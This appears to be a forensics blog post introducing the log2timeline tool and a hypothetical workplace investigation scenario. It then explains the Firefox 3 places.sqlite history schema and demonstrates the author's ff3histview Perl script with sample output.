Unfortunately there are few tools out there that can parse and produce body files from the various artifacts found on different operating systems to include with the traditional filesystem analysis.  A version of mactime first appeared in The Coroner’s Toolkit (TCT) (Dan Farmer) and later mac-daddy (Rob Lee).  Harlan Carvey has been working on some scripts for the Windows platform to accomplish this, such as regtime.pl to create a body file from the registry.  Usually these tools are build specifically to parse a single file/artifact that is of a particular format (such as a tool just to produce a body file from restore points).  I’ve released some tools like that, as well as H. Carvey and others.  I know of one attempt to create a framework to correlate different artifacts into a timeline, a project called Ex-Tip, by Mike Cloppert.  There is a GCFA gold paper describing the framework as well as a blog post on the SANS blog. This project was started in May 2008, but unfortunately hasn’t been maintained since then.  Instead of extending that project I decided to start my own, that is to add a tool that can correlate information found inside different log files and artifacts into the traditional timeline analysis.  The idea with this tool is to create a framework that can be easily extended to add new log parsers or new output plugins.  For the framework to be useful I wanted to be able to easily integrate this tool into already existing tools that deal with timeline analysis, so I chose to implement an output plugin that produces timelines in a mactime body format, to be used with the tool mactime from TSK (The SleuthKit).  This tool is called log2timeline and already supports incorporating 12 different log files/artifacts into the timeline.

  • Prefetch directory (reads the content of the directory and parses files found inside)
  • UserAssist key info (reads the NTUSER.DAT user registry file to parse the content of UserAssist keys)
  • Squid access logs (with emulate_httpd_log off)
  • Restore points (reads the content of the directory and parses rp.log file inside each restore point)
  • Windows shortcut files (LNK)
  • Firefox 3 history file (places.sqlite)
  • Windows Recycle Bin (INFO2)
  • Windows IIS W3C log files
  • OpenXML Metadata (for metadata inside Office 2007 documents)
  • ISA Server text export from queries (saved to clipboard and from there to a text file)
  • TLN (Timeline) body file
  • Mactime body file (so it can be output in a different format)

To show an example of the usage of the tool, let’s follow this scenario:

You are working for corporation X.  You have been approached by a member of the HR team as well as the legal team.  You are supposed to examine the workstation of one of the employees, a man named Joe.  He is suspected of reading documents that he is not allowed to do (a document named “Very secret document.txt” and “Not to be seen document.txt”) as well as to delete one of those documents.  He might as well have installed a wiping software on his machine.  According to corporate policies users are not allowed to install software on their machine (although they have the rights to do so, as they are members of the Administrator group on their workstations) and Internet Explorer is the only allowed browser.

First of all you need to start thinking about this particular case, that is:

  • What are you asked to find? (what questions to answer)
  • What data do you need to examine to answer those questions?
  • How do we extract that data?
  • What does that data tell you?

So for this particular case we have the following.  We are asked to answer these questions;

  • Did the user Joe read the documents “Very secret document.txt” and “Not to be seen document.txt”
  • Did the user Joe delete one of those documents
  • Did user Joe install a software designed to wipe documents

Next we need to find out what data we need to extract to get those information as well as to ask ourself what that data tells us. For this particular case we would need the following (at least to begin with):

  • Examine MACB times of the documents in question (they are stored inside “My Documents” folder of the user Administrator).  Since we know by talking to the user Administrator, he has not logged on to the machine since the alleged policy violation occurred so last access time to the documents might indicate that someone read them.
  • Examine timeline of the user Joe.  This could tell us what the user was doing on the day in question (4th of August)
  • Extract information found inside the Windows Prefetch folder.  This could tell us the last time a particular software was started, possibly indicating that a wiping software had been used or a software to read the text documents in question
  • Examine the Recycle Bin for deleted documents.  It is possible that the document that is suspected of being deleted still sits in the Recycle Bin
  • Examine deleted documents from the unallocated space.  See if we can find traces of the file on the unallocated space of the hard drive, indicating that it had been deleted.
  • Examine we history of user Joe. There is a suspicion that he installed a wiping software, so examining the web history could lead us to such activity
  • Examine the Windows shortcut files that are created inside Recent Documents folder of the user Joe.  This folder contains shortcut files (LNK) that point to the documents that are last opened by the user, possibly indicating that the user Joe opened the document in question (if the user did not delete the shortcut files after the fact).
  • Examine the registry file of the user Joe.  The registry contains wealth of information, so examining that could give us clues about the behavior of the user Joe.
  • And most likely some other clues, such as examining system registry, event logs, etc.

Tomorrow we will explore this particular hypothetical case in more detail, using the tool log2timeline to create a timeline and analyze it.

Firefox 3 History

Analysis of a browser history almost always comes up, no matter what is being investigated.  And despite Firefox being one of the most popular browsers currently used there aren’t many tools out there that can read and display browser history (at least in a human readable format).  There are tools out there, such as f3e from FirefoxForensics.com (firefoxforensics.com) however that tool, just as others that I’ve found, is only distrubuted as an EXE, running on Windows (and no source code is provided).

Traditionally Firefox stored the history file as a Mork file format, which could be easily read using any standard editor.  The new version, that is version  3 which has been out for quite some time now, uses a different method of storing user history. The history file is stored in a MozStorage format, as a SQLite database (see description here) in a file called places.sqlite. The tables can be easily read using sqlite3 for instance:

sqlite3 places.sqlite ".tables"
moz_anno_attributes  moz_favicons         moz_keywords
moz_annos            moz_historyvisits    moz_places
moz_bookmarks        moz_inputhistory
moz_bookmarks_roots  moz_items_annos

There are two tables in particular that are of interest , the moz_places and moz_historyvisits table. The schema for these tables can as well be easily extracted using sqlite3:

sqlite3 places.sqlite ".schema moz_places"
CREATE TABLE moz_places (
id INTEGER PRIMARY KEY,
url LONGVARCHAR,
title LONGVARCHAR,
rev_host LONGVARCHAR,
visit_count INTEGER DEFAULT 0,
hidden INTEGER DEFAULT 0 NOT NULL,
typed INTEGER DEFAULT 0 NOT NULL,
favicon_id INTEGER,
frecency INTEGER DEFAULT -1 NOT NULL);
CREATE INDEX moz_places_faviconindex ON moz_places (favicon_id);
CREATE INDEX moz_places_frecencyindex ON moz_places (frecency);
CREATE INDEX moz_places_hostindex ON moz_places (rev_host);
CREATE UNIQUE INDEX moz_places_url_uniqueindex ON moz_places (url);
CREATE INDEX moz_places_visitcount ON moz_places (visit_count);

And for the moz_historyvisists:

sqlite3 places.sqlite ".schema moz_historyvisits"
CREATE TABLE moz_historyvisits (
id INTEGER PRIMARY KEY,
from_visit INTEGER,
place_id INTEGER,
visit_date INTEGER,
 visit_type INTEGER,
session INTEGER);
CREATE INDEX moz_historyvisits_dateindex ON moz_historyvisits (visit_date);
CREATE INDEX moz_historyvisits_fromindex ON moz_historyvisits (from_visit);
CREATE INDEX moz_historyvisits_placedateindex ON moz_historyvisits (place_id, visit_date);
CREATE TRIGGER moz_historyvisits_afterdelete_v1_trigger
AFTER DELETE ON moz_historyvisits FOR EACH ROW
WHEN OLD.visit_type NOT IN (0,4,7)
BEGIN UPDATE moz_places SET visit_count = visit_count - 1
WHERE moz_places.id = OLD.place_id
AND visit_count > 0; END;
CREATE TRIGGER moz_historyvisits_afterinsert_v1_trigger
 AFTER INSERT ON moz_historyvisits FOR EACH ROW
WHEN NEW.visit_type NOT IN (0,4,7)
BEGIN UPDATE moz_places SET visit_count = visit_count + 1
WHERE moz_places.id = NEW.place_id; END;

According to the FirefoxForensics.com web site the explanation of each of keys found in the moz_places is roughly the following:

  • id INTEGER PRIMARY KEY, an integer that indicates the primary key for the database, of no real interest
  • url LONGVARCHAR, the URL that has been visited and the protocol used, something that one likes to examine.
  • title LONGVARCHAR, the title of the page as it appears in the browser
  • rev_host LONGVARCHAR, the reverse of the host name that was visited. used to ease searching and querying into hosts visited in history file.
  • visit_count INTEGER DEFAULT 0, as the variable implies a counter for the site
  • hidden INTEGER DEFAULT 0 NOT NULL,either 0 or 1. if the URL is hidden then the user did not navigate directly to it, usually indicates an embedded page using something like an iframe
  • typed INTEGER DEFAULT 0 NOT NULL,indicates whether the user typed the URL directly into the location bar
  • favicon_id INTEGER,relationship to another table containing favicon
  • frecency INTEGER DEFAULT -1 NOT NULL, combination of frequency and recency, used to calculate which sites appear at the top of the suggestion list when URL’s are typed in the address bar.

Since we know the structure and the meaning of each key in the database it is simple to create a script that can parse the database and display the content as you wish.  The Perl script I wrote is called ff3histview and can be found here.  It reads the places.sqlite database and displays the content of it in a human readable format.  The usage of the script is the following:

ff3histview [--help|-?|-help]
This screen
ff3histview [-t TIME] [-csv|-txt|-html] [-s|--show-hidden] [-o|--only-typed] [-quiet]    places.sqlite
     -t Defines a time scew if the places.sqlite was placed on a computer with a wrong time settings.  The format of the
        variable TIME is: X | Xs | Xm | Xh
       where X is a integer and s represents seconds, m minutes and h hours (default behaviour is seconds)
     -quiet Does not ask questions about case number and reference (default with CSV output)
     -csv|-txt|-html The output of the file.  TXT is the default behaviour and is chosen if none of the others is chosen
     -s or --show-hidden displays the "hidden" URLs as well as others.  These URL's represent URLs that the user
       did not specifically navigate to.
     -o or --only-typed Only show URLs that the user typed directly into the location/URL bar.

     places.sqlite is the SQLITE database that contains the web history in Firefox 3.  It should be located at:
           [win xp] c:\Documents and Settings\USER\Application Data\Mozilla\Firefox\Profiles\PROFILE\places.sqlite
           [linux] /home/USER/.mozilla/firefox/PROFILE/places.sqlite
           [mac os x] /Users/USER/Library/Application Support/Firefox/Profiles/PROFILE/places.sqlite

The default behaviour of the script is to extract all URL’s from moz_places that are not hidden (can be changed using parameters to the script, as well as to only see user typed in URLs). A hidden URL, according to firefoxforensics.com, is a URL “that the use did not specifically navigate to. These are comonly embedded pages, i-frames, RSS bookmarks and javascript calls.”[1] So the SQL statement that the script executes is:

SELECT moz_historyvisits.id,url,title,visit_count,visit_date,from_visit,rev_host
FROM moz_places, moz_historyvisits
WHERE
 moz_places.id = moz_historyvisits.place_id
 AND hidden = 0

In fact a really simple SQL statement, just to extract the URLs and some other information of value. The “from_visit” that is extracted refers to a URL that the user navigated from. Relevant information about those nodes are extracted as well, giving the investigator more information about context.

The script can output both in text format as well as CSV (Comma Seperated Value) for spreadsheet manipulation as well as a HTML page. Examples of usage (standard default behavior, without asking questions about case details) :

ff3histview -q  places.sqlite
Firefox 3 History Viewer
Not showing 'hidden' URLS, that is URLs that the user did not specifically navigate to, use -s to show them
Date of run (GMT): 13:7:9, Thu Jul 2, 2009
Time offset of history file: 0 s
-------------------------------------------------------
Date                Count    Host name    URL    notes
Thu Jun 25 09:16:17 2009    1    www.regripper.net    http://www.regripper.net/
Wed Jun 24 20:19:53 2009    1    isc.sans.org    http://isc.sans.org/
Thu Jun 25 12:43:14 2009    1    snort.org    http://snort.org/
Thu Jun 25 12:43:09 2009    2    www.snort.org    http://www.snort.org/
Thu Jun 25 12:53:51 2009    2    www.snort.org    http://www.snort.org/    From: http://www.snort.org/news
Thu Jun 25 12:48:09 2009    1    www.snort.org    http://www.snort.org/news    From: http://www.snort.org/
Thu Jun 25 18:38:35 2009    1    www.groklaw.net    http://www.groklaw.net/    From:
-------------------------------------------------------

And if there is any discrepancies in the time settings of the investigator’s machine and the suspect’s one:

ff3histview -q -t 14380  places.sqlite
Firefox 3 History Viewer
Not showing 'hidden' URLS, that is URLs that the user did not specifically navigate to, use -s to show them
Date of run (GMT): 13:8:34, Thu Jul 2, 2009
Time offset of history file: 14380 s
-------------------------------------------------------
Date                Count    Host name    URL    notes
Thu Jun 25 13:15:57 2009    1    www.regripper.net    http://www.regripper.net/
Thu Jun 25 00:19:33 2009    1    isc.sans.org    http://isc.sans.org/
Thu Jun 25 16:42:54 2009    1    snort.org    http://snort.org/
Thu Jun 25 16:42:49 2009    2    www.snort.org    http://www.snort.org/
Thu Jun 25 16:53:31 2009    2    www.snort.org    http://www.snort.org/    From: http://www.snort.org/news
Thu Jun 25 16:47:49 2009    1    www.snort.org    http://www.snort.org/news    From: http://www.snort.org/
Thu Jun 25 22:38:15 2009    1    www.groklaw.net    http://www.groklaw.net/    From:
-------------------------------------------------------

And if we want to include “hidden” URL’s:

ff3histview -q -t 14380 -s places.sqlite
Firefox 3 History Viewer
Showing hidden URLs as well

Date of run (GMT): 13:14:58, Thu Jul 2, 2009
Time offset of history file: 14380 s

-------------------------------------------------------
Date                Count    Host name    URL    notes
Thu Jun 25 13:15:57 2009    1    www.regripper.net    http://www.regripper.net/
Thu Jun 25 00:19:33 2009    1    isc.sans.org    http://isc.sans.org/
Thu Jun 25 00:19:36 2009    0    www.sans.org    http://www.sans.org/banners/isc.php    From: http://isc.sans.org/
Thu Jun 25 06:14:16 2009    0    www.sans.org    http://www.sans.org/banners/isc.php    From: http://isc.sans.org/
Thu Jun 25 15:01:07 2009    0    www.sans.org    http://www.sans.org/banners/isc.php    From: http://isc.sans.org/
Thu Jun 25 06:19:18 2009    0    www.sans.org    http://www.sans.org/banners/isc_ss.php    From:
Thu Jun 25 15:58:20 2009    0    www.sans.org    http://www.sans.org/banners/isc_ss.php    From:
Thu Jun 25 13:15:57 2009    0    www.regripper.net    http://www.regripper.net/links.htm    From: http://www.regripper.net/
Thu Jun 25 13:15:57 2009    0    www.regripper.net    http://www.regripper.net/main.htm    From: http://www.regripper.net/
Thu Jun 25 13:16:13 2009    0    www.regripper.net    http://www.regripper.net/RegRipper/    From: http://www.regripper.net/links.htm
Thu Jun 25 13:16:17 2009    0    www.regripper.net    http://www.regripper.net/RegRipper/RegRipper/    From: http://www.regripper.net/RegRipper/
Thu Jun 25 13:16:28 2009    0    regripper.invisionplus.net    http://regripper.invisionplus.net/    From: http://www.regripper.net/links.htm
Thu Jun 25 16:42:54 2009    1    snort.org    http://snort.org/    From: http://www.regripper.net/links.htm
Thu Jun 25 16:42:49 2009    2    www.snort.org    http://www.snort.org/    From: http://www.regripper.net/links.htm
Thu Jun 25 16:53:31 2009    2    www.snort.org    http://www.snort.org/    From: http://www.snort.org/news
Thu Jun 25 16:47:49 2009    1    www.snort.org    http://www.snort.org/news    From: http://www.snort.org/
Thu Jun 25 22:38:15 2009    1    www.groklaw.net    http://www.groklaw.net/    From:
-------------------------------------------------------

And for the HTML output:

ff3histview  -t 14380 --html places.sqlite
History HTML

Kristinn Guðjónsson, GCFA #5028, works as a forensic analyst and incident handler as well as being a local mentor for SANS.